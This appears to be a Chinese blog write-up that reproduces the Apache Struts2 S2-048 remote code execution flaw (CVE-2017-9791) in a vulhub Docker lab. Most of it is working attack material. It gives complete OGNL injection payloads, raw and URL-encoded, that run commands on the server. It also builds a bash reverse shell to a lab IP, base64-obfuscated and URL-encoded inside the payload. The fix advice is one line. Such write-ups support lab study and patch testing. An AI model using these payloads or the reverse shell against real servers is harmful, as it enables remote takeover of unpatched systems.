CVE-2017-9791 S2-048 远程代码执行漏洞
漏洞 远程 2017 CVE 代码执行 S2
2023-06-13 09:16:09 时间
1 漏洞信息
漏洞名称 | 远程代码执行漏洞 |
---|---|
漏洞编号 | CVE-2017-9791 |
危害等级 | 高危 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Apache |
漏洞组件 | Struts2 |
受影响版本 | 2.0.0 <= Struts2 <= 2.3.32 |
漏洞概述 | 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 |
2 环境搭建
2.1 环境概述
- Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-048
docker-compose up -d
访问http://192.168.146.158:8048/integration/editGangster.action
3 漏洞复现
访问url,然后在Name写入${333*3}
,Age和Description随便写。
发现成功执行了333*3的乘法,说明存在该漏洞。
既然发现漏洞了,那我们可以构造一个payload,执行id命令。
name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29.%28%23q%29%7D&age=2&__checkbox_bustedBefore=true&description=3
payload原型:
name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}&age=2&__checkbox_bustedBefore=true&description=3
成功执行了id命令。
接下来开始反弹shell
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
进行base加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
然后进行url编码
bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D
访问漏洞url并且添加恶意payload进行抓包。
name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%29%29.%28%23q%29%7D&age=2&__checkbox_bustedBefore=true&description=3
payload原型:
name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream())).(#q)}&age=2&__checkbox_bustedBefore=true&description=3
攻击机进行监听,然后发现成功反弹了shell。
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- Apache Log4j2远程代码执行漏洞
- Apache Struts2远程代码执行漏洞(S2-015)复现及修复方案 「建议收藏」
- chrome 0day rce 漏洞复现
- Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现
- HTTP.SYS远程代码执行漏洞
- 三大漏洞扫描工具报告获取
- 低版本某远控RCE/LPE漏洞复现
- 一文了解CSRF漏洞
- 入侵mysql数据库_SQL注入漏洞
- Apache log4j2 远程命令执行漏洞复现
- 锐捷EWEB网管系统远程命令执行漏洞
- CVE-2017-12611 S2-053 远程代码执行漏洞
- CVE-2013-1966 S2-013 远程代码执行漏洞
- CVE-2016-3081 S2-032 远程代码执行漏洞
- CVE-2017-5638 S2-045 远程代码执行漏洞
- GitLab 通过安全更新修复了帐户接管高危漏洞
- 谷歌发布安全消息称有黑客正在野外积极利用安卓系统的4枚零日漏洞
- Linux Systemd被爆远程漏洞 CVE-2017
- Linux下堆溢出漏洞分析(linux堆溢出)
- CVE-2017-12617-Tomcat远程代码执行漏洞复现测试
- PHP multipart.form-data 远程DOS漏洞
- Linux漏洞问题:CVE安全问题与解决方案(linuxcve)